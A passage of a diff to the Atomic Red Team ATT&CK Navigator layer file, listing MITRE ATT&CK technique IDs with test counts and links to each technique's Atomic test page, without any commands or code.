Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552.004","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1552.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1552.007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1553","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"}]},{"techniqueID":"T1553.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.003/T1553.003.md"}]},{"techniqueID":"T1553.004","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555","score":27,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"}]},{"techniqueID":"T1555.003","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555.004","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.004/T1555.004.md"}]},{"techniqueID":"T1556","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1556.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"}]},{"techniqueID":"T1557","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557/T1557.md"}]},{"techniqueID":"T1557.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1558","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558/T1558.md"}]},{"techniqueID":"T1558.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.002/T1558.002.md"}]},{"techniqueID":"T1558.003","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559/T1559.md"}]},{"techniqueID":"T1559.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1560.001","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1562","score":111,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":49,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.003","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562.004","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.008","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1562.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.009/T1562.009.md"}]},{"techniqueID":"T1563","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563/T1563.md"}]},{"techniqueID":"T1563.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564","score":28,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1566","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566/T1566.md"}]},{"techniqueID":"T1566.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md"}]},{"techniqueID":"T1567.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.003/T1567.003.md"}]},{"techniqueID":"T1569","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"}]},{"techniqueID":"T1569.002","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1570","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1570/T1570.md"}]},{"techniqueID":"T1571","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1574.008","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.008/T1574.008.md"}]},{"techniqueID":"T1574.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1580","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1580/T1580.md"}]},{"techniqueID":"T1592","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592/T1592.md"}]},{"techniqueID":"T1592.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592.001/T1592.001.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1612","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1612/T1612.md"}]},{"techniqueID":"T1613","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]},{"techniqueID":"T1614","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]},{"techniqueID":"T1615","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]},{"techniqueID":"T1647","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1647/T1647.md"}]},{"techniqueID":"T1649","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1649/T1649.md"}]},{"techniqueID":"T1654","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1654/T1654.md"}]}]}
\ No newline at end of file
+{"name":"Atomic Red Team","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":47,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1003.001","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003.007","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003.008","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1005/T1005.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1014","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1016","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.005/T1021.005.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1027.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1030","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1036.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1037","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1037.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"}]},{"techniqueID":"T1037.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1048.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.003","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.005","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1053.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1055","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1055.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.002/T1055.002.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.011","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.011/T1055.011.md"}]},{"techniqueID":"T1055.012","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055.015","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.015/T1055.015.md"}]},{"techniqueID":"T1056","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":51,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.001","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"}]},{"techniqueID":"T1059.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.004","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.006","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":67,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1070.001","score":3,"enabled":true,"links":[{"label":"View 